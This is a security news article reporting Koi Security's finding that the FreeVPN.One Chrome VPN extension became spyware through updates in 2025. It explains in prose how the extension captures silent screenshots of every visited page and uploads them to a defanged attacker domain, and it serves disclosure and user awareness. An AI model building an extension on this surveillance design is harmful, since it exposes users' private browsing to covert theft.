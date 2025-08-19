A popular Google-featured browser extension offering a virtual private network (VPN) service recently turned malicious and is now spying on users’ every move online. Researchers from Koi Security detected that FreeVPN.One, a VPN extension with over 100,000 installs on the Chrome Web Store, a ‘Verified’ status and a 3.8/5 rating from 1110 reviews, has been acting as spyware for the past five months. Launched in 2020, according to the Chrome Stats website, FreeVPN.One was a seemingly legitimate Chrome VPN extension until an update to version 3.0.3 of the application in April 2025. With that update, the FreeVPN.One developer added an permission, meaning that the extension could now access every site a user visited. “At this point, although the permission allowed broader access, the content scripts were still limited to the VPN provider’s domains. No spying yet, but the door was now open,” said Lotan Sery, author of the Koi Security report published on August 19. Two updates later, FreeVPN.One is at v3.1.3 on July 17. With this latest version, the extension started silently capturing screenshots of users’ online activity and collecting and exfiltrating sensitive and personal information.

Private pictures sent to FreeVPN.One’s backend. Source: Koi Security

Later in July, the developer added a new layer of obfuscation, an AES-256 encryption with RSA key wrapping and switching from the aitd.one domain to a new subdomain, scan.aitd.one. This, the researchers supposed was to “cover its tracks.” The FreeVPN.One Spyware Capabilities Explained The FreeVPN.One extension operates covertly by automatically capturing screenshots of every webpage users visit, without their knowledge or consent. Using a two-stage process, it injects a content script into all HTTP/HTTPS sites via broad manifest permissions. After a deliberate 1.1-second delay (to ensure pages fully load), the script triggers a background service worker to take a silent screenshot via Chrome’s privileged captureVisibleTab() API. The captured image, along with the page URL, tab ID, and a unique user identifier, is then uploaded to the attacker-controlled domain aitd[.]one/brange.php. This stealthy surveillance happens continuously, with no visual indicators or user interaction required, allowing the extension to harvest sensitive data without detection. While the extension includes a legitimate sounding "Scan with AI Threat Detection" feature, introduced in a July 2025 update (v3.1.1) that discloses screenshot uploads to aitd[.]one/analyze.php in its privacy policy, this is a smokescreen.

“Scan with AI” click redirects to aitd[.]one site. Source: Koi Security